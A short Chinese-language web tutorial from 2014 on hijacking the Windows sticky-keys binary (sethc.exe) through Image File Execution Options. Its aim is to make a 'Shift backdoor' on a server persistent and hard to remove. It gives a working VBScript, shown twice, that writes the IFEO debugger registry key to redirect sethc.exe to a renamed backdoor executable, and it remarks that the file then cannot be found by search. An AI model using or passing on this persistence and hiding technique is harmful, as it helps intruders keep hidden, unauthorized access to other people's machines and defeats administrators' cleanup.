镜像劫持sethc.exe保护你的服务器后门
发布时间:2014-06-25 点击数:1686
大家都知道Shift后门对应的文件为:sethc.exe
只要把sethc.exe挟持,别人就删不掉了。
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\xx32.exe","REG_SZ"
把上面代码保存为 *.vbs, 然后运行vbs就可以了
用来挟持shift的,让别人替换不了你的后门
这里注意了,shift后门文件名可以随便写,我这里是xx32.exe
这样在电脑里也搜索不到sethc.exe,哈哈
但必须跟代码里的文件名对应上,system32目录下的
只要把sethc.exe挟持,别人就删不掉了。
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\xx32.exe","REG_SZ"
把上面代码保存为 *.vbs, 然后运行vbs就可以了
用来挟持shift的,让别人替换不了你的后门
这里注意了,shift后门文件名可以随便写,我这里是xx32.exe
这样在电脑里也搜索不到sethc.exe,哈哈
但必须跟代码里的文件名对应上,system32目录下的
上一篇:清理ARP病毒局域网不再频繁断 下一篇:cacls命令控制权限详解